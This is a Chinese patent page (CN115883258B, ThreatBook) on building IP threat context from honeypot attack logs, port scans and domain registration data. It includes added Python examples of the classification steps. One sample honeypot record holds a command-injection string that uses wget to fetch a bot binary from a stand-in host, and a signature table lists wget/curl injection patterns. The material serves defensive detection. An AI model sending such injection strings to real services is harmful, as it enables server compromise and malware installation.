CN115883258B - IP information processing method, device, electronic equipment and storage medium - Google Patents


Info

Publication number
CN115883258B
Authority
CN
China
Prior art keywords
information data
attack
attacker
target
port
Prior art date
Legal status
Active
Application number
CN202310114335.5A
Other languages
Chinese (zh)
Other versions
CN115883258A (en)
Inventor
卢胜
樊兴华
薛锋
Current Assignee
Beijing ThreatBook Technology Co Ltd
Original Assignee
Beijing ThreatBook Technology Co Ltd
Application filed by Beijing ThreatBook Technology Co Ltd
Priority to CN202310114335.5A
Publication of CN115883258A
Application granted
Publication of CN115883258B
Legal status: Active

Classifications

    • Y: GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
    • Y02: TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
    • Y02D: CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
    • Y02D30/00: Reducing energy consumption in communication networks
    • Y02D30/50: Reducing energy consumption in communication networks in wire-line communication networks, e.g. low power modes or reduced link rate

Landscapes

  • Computer And Data Communications (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

The application provides an IP information processing method, an IP information processing device, electronic equipment and a storage medium. The IP information processing method comprises the steps of: acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system and the IP attack information data is acquired by an Internet honeypot system; and analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information. The method and the device can generate more comprehensive IP context information and improve the accuracy of the IP context information.

Description

IP information processing method, device, electronic equipment and storage medium
Technical Field
The present invention relates to the field of computer technologies, and in particular, to an IP information processing method, an apparatus, an electronic device, and a storage medium.
Background
In recent years, the field of network security has received increasing attention from governments and society. A large number of attackers on the Internet use vulnerability scanning tools (a vulnerability scanning tool judges whether a vulnerability exists in a target IP service) to scan the services of IP addresses across the whole Internet, thereby obtaining IP context information.
However, the IP context information obtained in the prior art is incomplete and of low accuracy.
Disclosure of Invention
An object of an embodiment of the present application is to provide an IP information processing method, apparatus, electronic device, and storage medium, which are used to generate more comprehensive IP context information and improve the accuracy of the IP context information.
In a first aspect, the present invention provides an IP information processing method, the method including:
acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an Internet honeypot system;
and analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information.
In the first aspect of the present application, IP port service information data, IP attack information data and IP basic information data are acquired, where the IP port service information data is collected by a network space detection system and the IP attack information data is collected by an Internet honeypot system; the three kinds of data can then be analyzed to generate IP context information. Compared with the prior art, because the IP context information is generated from the IP port service information data, the IP attack information data and the IP basic information data together, it is more comprehensive and of higher accuracy.
In an alternative embodiment, the IP attack information data includes: the attacker's source IP, the attacker's source port, the attacker's HTTP request method, the service type targeted by the attack, the port targeted by the attack, the userAgent of the attacker's HTTP request, the URL address requested by the attacker and the value of the POST packet sent by the attacker;
the IP port service information data includes: the ports opened by the target IP, response packet details, service names and version information;
and the IP basic information data includes: the geographic location of the target IP, the domain name resolved by the target IP, the domain name registrant of that domain name and the mailbox of that domain name.
In the above alternative embodiment, the more comprehensive and more accurate IP context information may be generated by the data such as the source IP of the attacker, the source port of the attacker, the HTTP request method of the attacker, the target service type of the attacker attack, the target port of the attacker attack, and the like.
In an alternative embodiment, after the acquiring the IP port service information data, the IP attack information data, and the IP basic information data, before the analyzing the IP port service information data, the IP attack information data, and the IP basic information data to generate the IP context information, the method further includes:
and associating and storing the IP port service information data, the IP attack information data and the IP basic information data through unique IP addresses.
In the above optional embodiment, the IP port service information data, the IP attack information data, and the IP basic information data may be associated and stored by a unique IP address, so that IP analysis efficiency may be improved.
In an alternative embodiment, the analyzing the IP port service information data, the IP attack information data, and the IP base information data to generate IP context information includes:
matching URL addresses in the value of the POST packet sent by the attacker to obtain a first URL address set;
filtering normal websites in the first URL address set based on a white list to obtain a second URL address set;
downloading a file associated with each URL address in the second URL address set;
scanning each URL address-associated file based on an antivirus engine, wherein if a scanning result indicates that the URL address-associated file is a malicious file, storing the URL address into a Trojan downloading address field of a current IP address, and storing a Hash value of the malicious file and the scanning result into a sample set;
comparing the value of the POST packet sent by the attacker with a preset vulnerability characteristic, marking the vulnerability type of the current IP address if the value of the POST packet sent by the attacker hits the preset vulnerability characteristic, and determining that the current IP address has penetration attack;
judging whether the HTTP request method of the attacker is GET or not, and comparing the IP attack information data with vulnerability characteristics;
when the HTTP request method of the attacker is GET and the comparison result represents that character features of the exploit do not exist in the IP attack information, determining that scanning attack exists in the current IP address.
In the above optional implementation, URL addresses are matched in the value of the POST packet sent by the attacker to obtain a first URL address set; normal websites in the first URL address set are filtered out based on a white list to obtain a second URL address set; the file associated with each URL address in the second URL address set is downloaded; and each such file is scanned by an antivirus engine, where if the scanning result indicates that the file is malicious, the URL address is stored in the Trojan download address field of the current IP address and the Hash value of the malicious file and the scanning result are stored in a sample set. On the other hand, by comparing the value of the POST packet sent by the attacker with the preset vulnerability characteristics, when the value hits the preset vulnerability characteristics, the vulnerability type of the current IP address can be marked and it is determined that the current IP address has a penetration attack. In still another aspect, by judging whether the HTTP request method of the attacker is GET and comparing the IP attack information data with the vulnerability characteristics, when the HTTP request method is GET and the comparison result shows that no exploit character feature exists in the IP attack information, it can be determined that the current IP address has a scanning attack.
In an alternative embodiment, the analyzing the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information further includes:
judging whether the number of userAgents of the HTTP requests of the attacker is more than 5, if so, determining that the attacker has automatic scanning attack with hiding capability;
judging whether the userAgents of the HTTP requests of the attacker have botnet character features, and if so, carrying out botnet family marking on the current IP address.
In the above optional embodiment, by determining whether the number of userAgents of the attacker's HTTP requests is greater than 5, it can further be determined that the attacker has an automated scanning attack with hiding capability. On the other hand, by judging whether the userAgents of the attacker's HTTP requests have botnet character features, the current IP address can further be marked with a botnet family.
In an alternative embodiment, the analyzing the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information further includes:
judging whether the port opened by the target IP is port 22, and if so, determining that the current IP address is the IP address of a Linux server;
and judging whether the port opened by the target IP is port 3389, and if so, determining that the current IP address is the IP address of a Windows server.
In the above alternative embodiment, by determining whether the port opened by the target IP is port 22, it can further be determined that the current IP address is the IP address of a Linux server. On the other hand, by judging whether the port opened by the target IP is port 3389, it can further be determined that the current IP address is the IP address of a Windows server.
In an alternative embodiment, the analyzing the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information further includes:
judging whether the domain name resolved by the target IP, the domain name registrant of that domain name and the mailbox of that domain name have data, and if so, storing the domain name resolved by the target IP, its domain name registrant and its mailbox.
In the above optional embodiment, by determining whether the domain name resolved by the target IP, its domain name registrant and its mailbox have data, these three items can be stored when present.
In a second aspect, the present invention provides an IP information processing apparatus comprising:
the acquisition module is used for acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by the network space detection system, and the IP attack information data is acquired by the Internet honeypot system;
and the analysis module is used for analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information.
The device of the second aspect of the present application is capable of acquiring IP port service information data, IP attack information data and IP basic information data by executing an IP information processing method, where the IP port service information data is acquired by a network space detection system and the IP attack information data is acquired by an Internet honeypot system, so that analysis can be performed on the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and higher in accuracy.
In a third aspect, the present invention provides an electronic device comprising:
a processor; and
a memory configured to store machine readable instructions that, when executed by the processor, perform the IP information processing method of any of the preceding embodiments.
The electronic device of the third aspect of the present invention is capable of acquiring IP port service information data, IP attack information data, and IP basic information data by executing an IP information processing method, where the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an internet honeypot system, so that analysis can be performed on the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and higher in accuracy.
In a fourth aspect, the present invention provides a storage medium storing a computer program that is executed by a processor to perform the IP information processing method according to any one of the foregoing embodiments.
The storage medium of the fourth aspect can acquire IP port service information data, IP attack information data and IP basic information data by executing an IP information processing method, wherein the IP port service information data is acquired by a network space detection system and the IP attack information data is acquired by an Internet honeypot system, and further analysis can be performed on the IP port service information data, the IP attack information data and the IP basic information data so as to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and higher in accuracy.
Drawings
In order to more clearly illustrate the technical solutions of the embodiments of the present application, the drawings that are needed in the embodiments of the present application will be briefly described below, it should be understood that the following drawings only illustrate some embodiments of the present application and should not be considered as limiting the scope, and other related drawings may be obtained according to these drawings without inventive effort for a person skilled in the art.
Fig. 1 is a schematic flow chart of an IP information processing method disclosed in an embodiment of the present application;
fig. 2 is a schematic structural diagram of an IP information processing apparatus disclosed in an embodiment of the present application;
fig. 3 is a schematic structural diagram of an electronic device according to an embodiment of the present application.
Detailed Description
The technical solutions in the embodiments of the present application will be described below with reference to the drawings in the embodiments of the present application.
Example 1
Referring to fig. 1, fig. 1 is a flow chart of an IP information processing method disclosed in an embodiment of the present application, and as shown in fig. 1, the method in the embodiment of the present application includes the following steps:
101. acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an Internet honeypot system;
102. analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information.
In the embodiment of the application, the IP port service information data, the IP attack information data and the IP basic information data are acquired, wherein the IP port service information data are acquired by the network space detection system, the IP attack information data are acquired by the Internet honeypot system, and further the IP port service information data, the IP attack information data and the IP basic information data can be analyzed to generate the IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and higher in accuracy.
In this embodiment of the present application, for step 101, the acquired IP port service information data, IP attack information data, and IP basic information data include data related to a plurality of IP addresses, for example, IP port service information data, IP attack information data, and IP basic information data including IP address a, and also include IP port service information data, IP attack information data, and IP basic information data of IP address B.
In the embodiment of the present application, for step 101, please refer to the prior art for the related description of the network space detection system, which is not repeated herein. On the other hand, referring to the prior art for the internet honeypot system, the embodiments of the present application will not be described in detail.
In the embodiment of the present application, the IP context information refers to the result obtained by analyzing the IP port service information data, the IP attack information data and the IP basic information data. For example, in the analysis process of scanning the file associated with each URL address with the antivirus engine, if the scanning result indicates that the file associated with the URL address is a malicious file, the IP context information comprises a Trojan download address field, wherein the Trojan download address field points to the URL address from which the malicious file can be downloaded.
In this embodiment of the present application, as an optional implementation manner, the IP attack information data includes: the attacker's source IP, the attacker's source port, the attacker's HTTP request method, the service type targeted by the attack, the port targeted by the attack, the userAgent of the attacker's HTTP request, the URL address requested by the attacker and the value of the POST packet sent by the attacker. In another aspect, the IP port service information data includes: the ports opened by the target IP, response packet details, service names and version information. In yet another aspect, the IP basic information data includes the geographic location of the target IP, the domain name resolved by the target IP, the domain name registrant of that domain name and the mailbox of that domain name.
In the above alternative embodiment, the more comprehensive and more accurate IP context information may be generated by the data such as the source IP of the attacker, the source port of the attacker, the HTTP request method of the attacker, the target service type of the attacker attack, the target port of the attacker attack, and the like.
In the above alternative embodiment, the IP base information data may be provided by a third party platform.
In an alternative embodiment, after step 101 (acquiring the IP port service information data, the IP attack information data and the IP basic information data) and before step 102 (analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate the IP context information), the method according to the embodiment of the present application further includes the following step:
the IP port service information data, the IP attack information data and the IP basic information data are associated and stored through the unique IP address.
In the above alternative embodiment, the IP port service information data, the IP attack information data, and the IP basic information data are associated and stored by a unique IP address, so that the IP analysis efficiency can be improved.
In the above alternative embodiment, associating and storing the IP port service information data, the IP attack information data and the IP basic information data by unique IP address means gathering all data belonging to the same IP address under that one IP address. For example, assume there are two data records, IP port service information data A and IP port service information data B; if the IP address of IP port service information data B is the same as the IP address in IP port service information data A, then IP port service information data A and IP port service information data B are associated together, that is, the two data records are associated by IP address.
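As an added illustration of the association step (this is example code written for this page, not the patent's or ThreatBook's implementation), the function below groups records from the three sources under one key per unique IP address. The record field names (`ip`, `src_ip`, `post_body`, and so on) and all sample records are constructed assumptions. The one point worth taking from it beyond the paragraph above is that the key must be the canonical form of the address: the honeypot may log an IPv6 source in expanded form while the scanner reports it compressed, and a plain string key would split one attacker into two records.

```python
"""Associate honeypot, port-scan and basic records under one normalized IP key.

Added example (not the patent's own code): constructed sample records,
hypothetical field names, and IP normalization via the standard ipaddress
module so that textually different spellings of one address share a key.
"""
import ipaddress
from collections import defaultdict

# Constructed sample records; field names are assumptions, not the patent's schema.
PORT_SERVICE_RECORDS = [
    {"ip": "203.0.113.10", "port": 22, "service": "ssh", "version": "OpenSSH 8.9"},
    {"ip": "203.0.113.10", "port": 80, "service": "http", "version": "nginx 1.24"},
    {"ip": "2001:db8::1", "port": 3389, "service": "ms-wbt-server", "version": ""},
]
ATTACK_RECORDS = [
    {"src_ip": "203.0.113.10", "src_port": 51234, "method": "GET", "target_port": 80,
     "user_agent": "curl/8.1", "url": "/", "post_body": ""},
    # Same host as the scanner's "2001:db8::1", but logged in expanded form.
    {"src_ip": "2001:0db8:0000:0000:0000:0000:0000:0001", "src_port": 40001,
     "method": "POST", "target_port": 8080, "user_agent": "Mozilla/5.0",
     "url": "/login", "post_body": "user=admin"},
]
BASIC_RECORDS = [
    {"ip": "203.0.113.10", "geo": "example-region", "domain": "host.example",
     "registrant": "Example Registrant", "mailbox": "abuse@example"},
    {"ip": "not-an-ip", "geo": "?", "domain": "", "registrant": "", "mailbox": ""},
]


def normalize_ip(text):
    """Return the canonical string form of an IP, or None if it does not parse.

    '2001:0db8:...:0001' and '2001:db8::1' both become '2001:db8::1', so they
    land under the same key; garbage values are rejected rather than silently
    becoming a bogus key in the context store.
    """
    try:
        return str(ipaddress.ip_address(text.strip()))
    except ValueError:
        return None


def associate_by_ip(port_records, attack_records, basic_records):
    """Group the three data sources under one record per unique IP address.

    Each IP maps to {'port_services': [...], 'attacks': [...], 'basic': {...}}.
    Port-service and attack records are one-to-many per IP; basic information
    is one-to-one, and a later basic record for the same IP replaces an earlier
    one. Records whose IP fails to parse are returned separately as rejected.
    """
    grouped = defaultdict(lambda: {"port_services": [], "attacks": [], "basic": None})
    rejected = []
    for rec in port_records:
        key = normalize_ip(rec["ip"])
        if key:
            grouped[key]["port_services"].append(rec)
        else:
            rejected.append(rec)
    for rec in attack_records:
        key = normalize_ip(rec["src_ip"])
        if key:
            grouped[key]["attacks"].append(rec)
        else:
            rejected.append(rec)
    for rec in basic_records:
        key = normalize_ip(rec["ip"])
        if key:
            grouped[key]["basic"] = rec
        else:
            rejected.append(rec)
    return dict(grouped), rejected


if __name__ == "__main__":
    table, bad = associate_by_ip(PORT_SERVICE_RECORDS, ATTACK_RECORDS, BASIC_RECORDS)
    for ip, ctx in sorted(table.items()):
        print(ip, len(ctx["port_services"]), "port records,", len(ctx["attacks"]), "attack records")
    print("rejected records:", len(bad))
```

With the constructed input, the two spellings of the IPv6 address collapse into a single `2001:db8::1` entry holding one port record and one attack record, and the malformed basic record is reported rather than stored.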
In the first aspect of the present application, as an optional implementation manner, step 102, analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information, comprises the sub-steps of:
matching URL addresses in the value of the POST packet sent by the attacker to obtain a first URL address set;
filtering normal websites in the first URL address set based on the white list to obtain a second URL address set;
downloading a file associated with each URL address in the second URL address set;
scanning each URL address-associated file based on an antivirus engine, wherein if the scanning result indicates that the URL address-associated file is a malicious file, storing the URL address into a Trojan download address field of a current IP address, and storing a Hash value and the scanning result of the malicious file into a sample set;
comparing the value of the POST packet sent by the attacker with a preset vulnerability feature, marking the vulnerability type of the current IP address if the value of the POST packet sent by the attacker hits the preset vulnerability feature, and determining that the current IP address has penetration attack;
judging whether the HTTP request method of the attacker is GET or not, and comparing the IP attack information data with the vulnerability characteristics;
when the HTTP request method of the attacker is GET and the comparison result represents that character features of the exploit do not exist in the IP attack information, it is determined that scanning attack exists in the current IP address.
In the above optional embodiment, URL addresses are matched in the value of the POST packet sent by the attacker to obtain a first URL address set; normal websites in the first URL address set are filtered out based on the white list to obtain a second URL address set; the file associated with each URL address in the second URL address set is downloaded; and each such file is scanned by the antivirus engine, where if the scanning result indicates that the file is malicious, the URL address is stored in the Trojan download address field of the current IP address and the Hash value of the malicious file and the scanning result are stored in a sample set. On the other hand, by comparing the value of the POST packet sent by the attacker with the preset vulnerability characteristics, when the value hits the preset vulnerability characteristics, the vulnerability type of the current IP address can be marked and it is determined that the current IP address has a penetration attack. In still another aspect, by judging whether the HTTP request method of the attacker is GET and comparing the IP attack information data with the vulnerability characteristics, when the HTTP request method is GET and the comparison result shows that no exploit character feature is present in the IP attack information, it can be determined that the current IP address has a scanning attack.
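The sub-steps of step 102 described above (both in the summary and here in Example 1), as an added worked example that is not part of the patent or of ThreatBook's product: one attacker IP's honeypot records are turned into the Trojan download addresses, sample set entries, vulnerability type marks and penetration/scanning verdicts the text names. The URL regex, the white list, the vulnerability signatures, the sample records and the `fetch`/`scan` callbacks that stand in for the downloader and the antivirus engine are all constructed for illustration. Two practitioner details the text leaves implicit are built in: the white list is matched on the URL's host (exact or subdomain), because a substring test would let `example.com.evil.test` pass as `example.com`; and the file hash is computed over the bytes actually scanned so the sample set entry and the verdict refer to the same object.

```python
"""Classify one attacker IP's honeypot records along the patent's sub-steps.

Added example, not the patent's or ThreatBook's code. The URL regex, the
white list, the vulnerability signatures, the sample records and the
fetch/scan callbacks are constructed placeholders for illustration.
"""
import hashlib
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s'\"<>;]+", re.IGNORECASE)

# Constructed white list of hosts whose downloads are treated as benign.
WHITELIST_HOSTS = {"example.com", "cdn.example.net"}

# Constructed, deliberately generic vulnerability characteristics (name -> regex).
VULN_SIGNATURES = {
    "path-traversal": re.compile(r"\.\./"),
    "sql-injection": re.compile(r"\bunion\s+select\b", re.IGNORECASE),
    "command-injection": re.compile(r";\s*(wget|curl)\s", re.IGNORECASE),
}


def host_whitelisted(url):
    """Exact host or subdomain match; a plain substring test would let
    'example.com.evil.test' slip through the white list."""
    host = (urlsplit(url).hostname or "").lower()
    return any(host == w or host.endswith("." + w) for w in WHITELIST_HOSTS)


def extract_download_urls(post_body):
    """Sub-steps 1 and 2: URL addresses in the POST value, minus white-listed hosts."""
    first_set = set(URL_RE.findall(post_body))
    return {u for u in first_set if not host_whitelisted(u)}


def hits_signature(text):
    """Sub-steps 5 and 6: name of the first vulnerability characteristic matched, else None."""
    for name, pattern in VULN_SIGNATURES.items():
        if pattern.search(text):
            return name
    return None


def analyse_ip(attack_records, fetch, scan):
    """Build the per-IP context fields the patent describes.

    fetch(url) -> bytes or None and scan(data) -> (is_malicious, verdict) stand
    in for the downloader and the antivirus engine; a deployment would fetch
    attacker-supplied URLs from an isolated sandbox, never the analysis host.
    """
    ctx = {"trojan_download_urls": [], "samples": [], "vuln_types": set(),
           "penetration_attack": False, "scanning_attack": False}
    for rec in attack_records:
        body = rec.get("post_body", "")
        method = rec.get("method", "").upper()
        # Sub-steps 3 and 4: download each candidate and scan it.
        for url in sorted(extract_download_urls(body)):
            data = fetch(url)
            if data is None:
                continue
            malicious, verdict = scan(data)
            if malicious:
                ctx["trojan_download_urls"].append(url)
                ctx["samples"].append((hashlib.sha256(data).hexdigest(), verdict))
        # Sub-step 5: POST value hits a vulnerability characteristic -> penetration attack.
        sig = hits_signature(body)
        if sig:
            ctx["vuln_types"].add(sig)
            ctx["penetration_attack"] = True
        # Sub-steps 6 and 7: GET with no exploit feature in URL or body -> scanning attack.
        if method == "GET" and hits_signature(rec.get("url", "") + body) is None:
            ctx["scanning_attack"] = True
    return ctx


# Constructed honeypot records and callbacks so the example runs offline.
SAMPLE_RECORDS = [
    {"method": "GET", "url": "/admin/", "post_body": ""},
    {"method": "POST", "url": "/cgi-bin/x",
     "post_body": "cmd=a; wget http://203.0.113.5/bot.bin; x=https://cdn.example.net/ok.js"},
]
FAKE_FILES = {"http://203.0.113.5/bot.bin": b"\x7fELF-constructed-sample"}


def fake_fetch(url):
    return FAKE_FILES.get(url)


def fake_scan(data):
    return (b"ELF-constructed" in data, "Constructed.Trojan.Example")


if __name__ == "__main__":
    print(analyse_ip(SAMPLE_RECORDS, fake_fetch, fake_scan))
```

On the constructed records the POST body yields two URLs, the `cdn.example.net` one is dropped by the white list, the remaining download is flagged by the stand-in scanner and lands in the Trojan download address field together with its SHA-256 and verdict, the body also hits the `command-injection` characteristic (penetration attack), and the plain GET to `/admin/` with no exploit feature is recorded as a scanning attack.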
In the embodiment of the present application, as an optional implementation manner, step 102: analyzing the service information data based on the IP port, the IP attack information data and the IP basic information data to generate IP context information, and further comprising the following sub-steps:
judging whether the user agents of the HTTP requests of the attacker are more than 5, if so, determining that the attacker has automatic scanning attack with hiding capability;
judging whether the userAgents of the HTTP requests of the attacker have botnet character features, and if so, marking the current IP address with botnet family.
In the above alternative embodiment, by determining whether the number of userAgents of the attacker's HTTP requests is greater than 5, it can further be determined that the attacker has an automated scanning attack with hiding capability. On the other hand, by judging whether the userAgents of the attacker's HTTP requests have botnet character features, the current IP address can be marked with the botnet family.
In the alternative embodiment described above, as an example, the current IP address may be marked as one of the Mirai family, the king botnet family.
In the embodiment of the present application, as an optional implementation manner, step 102: analyzing the IP port based service information data, the IP attack information data and the IP base information data to generate IP context information, further comprising the steps of:
judging whether the port opened by the target IP is a 22 port, if so, determining that the current IP address is the IP address of the linux server;
and judging whether the port opened by the target IP is a 3389 port, if so, determining that the current IP address is the IP address of the windows server.
In the above alternative embodiment, whether the port opened by the target IP is a 22 port is determined, so that the current IP address can be determined as the IP address of the linux server. On the other hand, by judging whether the port opened by the target IP is the 3389 port, it is possible to determine that the current IP address is the IP address of the windows server. It should be noted that, in the above alternative embodiment, 22 ports are used to perform ssh services.
In the embodiment of the present application, as an optional implementation manner, step 102: analyzing the IP port based service information data, the IP attack information data and the IP base information data to generate IP context information, further comprising the steps of:
judging whether the data exists in the domain name resolved by the target IP, the domain name registrant of the domain name resolved by the target IP and the mailbox of the domain name resolved by the target IP, if so, storing the domain name resolved by the target IP, the domain name registrant of the domain name resolved by the target IP and the mailbox of the domain name resolved by the target IP.
In the above-mentioned alternative embodiment, by determining whether the target IP-resolved domain name, the domain name registrant of the target IP-resolved domain name, and the mailbox of the target IP-resolved domain name have data, the target IP-resolved domain name, the domain name registrant of the target IP-resolved domain name, and the mailbox of the target IP-resolved domain name may be stored.
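The three enrichment rules above (more than 5 userAgents and botnet userAgent features; port 22 and port 3389 as Linux/Windows indicators; storing the resolved domain name, registrant and mailbox only when present), as one added example that is not the patent's code. The thresholds and port mapping follow the text; the botnet userAgent patterns, the family name other than the page's own Mirai mention, and all sample records are constructed placeholders. The OS inference goes one step beyond the page, which is stated in its docstring: when the port service data carries a version banner that names the operating system, that banner outranks the port heuristic, since an SSH service on port 22 can also be an OpenSSH server on Windows.

```python
"""Enrich one IP's context from user agents, open ports and WHOIS-type data.

Added example (not the patent's code). Thresholds follow the patent: more
than 5 distinct userAgents, port 22 -> Linux, port 3389 -> Windows. The
botnet patterns, the placeholder family and all sample records are constructed.
"""
import re

UA_THRESHOLD = 5  # patent: more than 5 userAgents from one attacker

# Constructed patterns; real family signatures come from a curated intel feed.
BOTNET_UA_PATTERNS = {
    "Mirai": re.compile(r"mirai", re.IGNORECASE),
    "placeholder-family": re.compile(r"PLACEHOLDER-BOT-UA", re.IGNORECASE),
}

PORT_TO_OS = {22: "linux", 3389: "windows"}


def analyse_user_agents(attack_records):
    """Count distinct userAgents and match them against botnet character features."""
    agents = {r.get("user_agent", "") for r in attack_records if r.get("user_agent")}
    families = sorted(name for name, pat in BOTNET_UA_PATTERNS.items()
                      if any(pat.search(ua) for ua in agents))
    return {"distinct_user_agents": len(agents),
            "automated_scan_with_evasion": len(agents) > UA_THRESHOLD,
            "botnet_families": families}


def infer_host_os(port_records):
    """Patent rule: port 22 open -> Linux server, port 3389 open -> Windows server.

    Beyond the page: a version banner that names the OS outranks the port
    heuristic for that record, because OpenSSH also ships on Windows.
    """
    verdicts = set()
    for rec in port_records:
        banner = (rec.get("version") or "").lower()
        if "windows" in banner:
            verdicts.add("windows")
        elif any(k in banner for k in ("linux", "ubuntu", "debian")):
            verdicts.add("linux")
        elif rec.get("port") in PORT_TO_OS:
            verdicts.add(PORT_TO_OS[rec["port"]])
    return sorted(verdicts)


def store_whois(basic_record):
    """Keep the resolved domain name, registrant and mailbox only when they have data."""
    kept = {}
    for field in ("domain", "registrant", "mailbox"):
        value = (basic_record or {}).get(field)
        if value and value.strip():
            kept[field] = value.strip()
    return kept


def enrich(attack_records, port_records, basic_record):
    """Combine the three rules into the context fields for one IP."""
    ctx = analyse_user_agents(attack_records)
    ctx["host_os"] = infer_host_os(port_records)
    ctx["whois"] = store_whois(basic_record)
    return ctx


# Constructed sample data: six distinct userAgents, one carrying a Mirai marker.
SAMPLE_ATTACKS = [{"user_agent": ua} for ua in [
    "curl/8.1", "Mozilla/5.0 (X11)", "python-requests/2.31",
    "Go-http-client/1.1", "Wget/1.21", "Mirai-scanner/1.0 (constructed)"]]
SAMPLE_PORTS = [{"port": 22, "service": "ssh", "version": "OpenSSH 8.9 Ubuntu"},
                {"port": 80, "service": "http", "version": "nginx"}]
SAMPLE_BASIC = {"geo": "example-region", "domain": "host.example",
                "registrant": "", "mailbox": "  "}


if __name__ == "__main__":
    print(enrich(SAMPLE_ATTACKS, SAMPLE_PORTS, SAMPLE_BASIC))
```

For the constructed input the attacker is marked as an automated scanner with hiding capability (6 distinct userAgents), tagged with the Mirai family, inferred to be a Linux host, and only the non-empty `domain` field of the basic record is kept.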
In an embodiment of the present application, as an optional implementation manner, the method of the embodiment of the present application further includes the following steps:
the IP context information is shown.
Example 2
Referring to fig. 2, fig. 2 is a schematic structural diagram of an IP information processing apparatus according to an embodiment of the present application, and as shown in fig. 2, the apparatus according to the embodiment of the present application includes the following functional modules:
the acquisition module 201 is configured to acquire IP port service information data, IP attack information data, and IP basic information data, where the IP port service information data is acquired by the network space detection system, and the IP attack information data is acquired by the internet honeypot system;
the analysis module 202 is configured to analyze the IP port service information data, the IP attack information data, and the IP base information data to generate IP context information.
The device of the embodiment of the application can acquire the IP port service information data, the IP attack information data and the IP basic information data by executing the IP information processing method, wherein the IP port service information data is acquired by the network space detection system, the IP attack information data is acquired by the Internet honeypot system, and further the IP port service information data, the IP attack information data and the IP basic information data can be analyzed to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and higher in accuracy.
Example 3
Referring to fig. 3, which is a schematic structural diagram of an electronic device disclosed in an embodiment of the present application, the electronic device includes:
a processor 301; and
a memory 302 configured to store machine-readable instructions that, when executed by the processor 301, perform the IP information processing method of any of the preceding embodiments.
By executing the IP information processing method, the electronic device of this embodiment acquires IP port service information data (collected by the network space detection system), IP attack information data (collected by the Internet honeypot system) and IP basic information data, and analyzes the three together to generate IP context information. Compared with the prior art, IP context information generated from these three combined sources is more comprehensive and more accurate.
Example 4
This embodiment provides a storage medium storing a computer program which, when executed by a processor, performs the IP information processing method of any of the preceding embodiments.
Through the program it stores, the storage medium of this embodiment causes a processor to acquire IP port service information data (collected by the network space detection system), IP attack information data (collected by the Internet honeypot system) and IP basic information data, and to analyze the three together to generate IP context information. Compared with the prior art, IP context information generated from these three combined sources is more comprehensive and more accurate.
In the embodiments provided in the present application, it should be understood that the disclosed apparatus and method may be implemented in other ways. The apparatus embodiments described above are merely illustrative: the division into units is only a logical functional division, and other divisions are possible in practice; for example, several units or components may be combined or integrated into another system, or some features may be omitted or not performed. The couplings, direct couplings or communication connections shown or discussed may be indirect couplings or communication connections through some interface, device or unit, and may be electrical, mechanical or of another form.
Further, the units described as separate units may or may not be physically separate, and units displayed as units may or may not be physical units, may be located in one place, or may be distributed over a plurality of network units. Some or all of the units may be selected according to actual needs to achieve the purpose of the solution of this embodiment.
Furthermore, functional modules in various embodiments of the present application may be integrated together to form a single portion, or each module may exist alone, or two or more modules may be integrated to form a single portion.
It should be noted that the functions, if implemented as software functional modules and sold or used as a stand-alone product, may be stored in a computer-readable storage medium. On this understanding, the technical solution of the present application, in essence or in the part that contributes to the prior art, or a part of it, may be embodied as a software product stored in a storage medium and including several instructions that cause a computer device (a personal computer, a server, a network device, etc.) to perform all or part of the steps of the methods of the embodiments of the present application. The storage medium includes a USB flash drive, a removable hard disk, a read-only memory (ROM), a random access memory (RAM), a magnetic disk, an optical disk, or any other medium capable of storing program code.
In this document, relational terms such as first and second, and the like may be used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions.
The above is only an example of the present application, and is not intended to limit the scope of the present application, and various modifications and variations will be apparent to those skilled in the art. Any modification, equivalent replacement, improvement, etc. made within the spirit and principles of the present application should be included in the protection scope of the present application.

Claims (10)

1. An IP information processing method, the method comprising:
acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an Internet honeypot system;
analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information;
